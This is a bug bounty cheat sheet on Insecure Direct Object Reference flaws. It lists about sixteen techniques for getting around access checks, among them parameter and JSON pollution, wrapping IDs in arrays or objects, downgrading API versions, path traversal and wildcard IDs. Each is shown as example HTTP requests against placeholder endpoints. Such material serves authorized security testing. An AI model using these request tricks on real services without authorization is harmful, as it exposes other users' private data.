AllAboutBugBounty/Insecure Direct Object References.md
2022-06-15 17:38:42 +07:00

2.3 KiB

Insecure Direct Object Reference (IDOR)

Introduction

IDOR stands for Insecure Direct Object Reference is a security vulnerability in which a user is able to access and make changes to data of any other user present in the system.

How to FInd

  1. Add parameters onto the endpoints for example, if there was
GET /api/v1/getuser
[...]

Try this to bypass

GET /api/v1/getuser?id=1234
[...]
  1. HTTP Parameter pollution
POST /api/get_profile
[...]
user_id=hacker_id&user_id=victim_id
  1. Add .json to the endpoint
GET /v2/GetData/1234
[...]

Try this to bypass

GET /v2/GetData/1234.json
[...]
  1. Test on outdated API Versions
POST /v2/GetData
[...]
id=123

Try this to bypass

POST /v1/GetData
[...]
id=123
  1. Wrap the ID with an array.
POST /api/get_profile
[...]
{"user_id":111}

Try this to bypass

POST /api/get_profile
[...]
{"id":[111]}
  1. Wrap the ID with a JSON object
POST /api/get_profile
[...]
{"user_id":111}

Try this to bypass

POST /api/get_profile
[...]
{"user_id":{"user_id":111}}
  1. JSON Parameter Pollution
POST /api/get_profile
[...]
{"user_id":"hacker_id","user_id":"victim_id"}
  1. Try decode the ID, if the ID encoded using md5,base64,etc
GET /GetUser/dmljdGltQG1haWwuY29t
[...]

dmljdGltQG1haWwuY29t => victim@mail.com

  1. If the website using graphql, try to find IDOR using graphql!
GET /graphql
[...]
GET /graphql.php?query=
[...]
  1. MFLAC (Missing Function Level Access Control)
GET /admin/profile

Try this to bypass

GET /ADMIN/profile
  1. Try to swap uuid with number
GET /file?id=90ri2-xozifke-29ikedaw0d

Try this to bypass

GET /file?id=302
  1. Change HTTP Method
GET /api/v1/users/profile/111

Try this to bypass

POST /api/v1/users/profile/111
  1. Path traversal
GET /api/v1/users/profile/victim_id

Try this to bypass

GET /api/v1/users/profile/my_id/../victim_id
  1. Change request content type
Content-type: application/xml

Try this to bypass

Content-type: application/json
  1. Send wildcard instead of ID
GET /api/users/111

Try this to bypass

GET /api/users/*
  1. Try google dorking to find new endpoint

References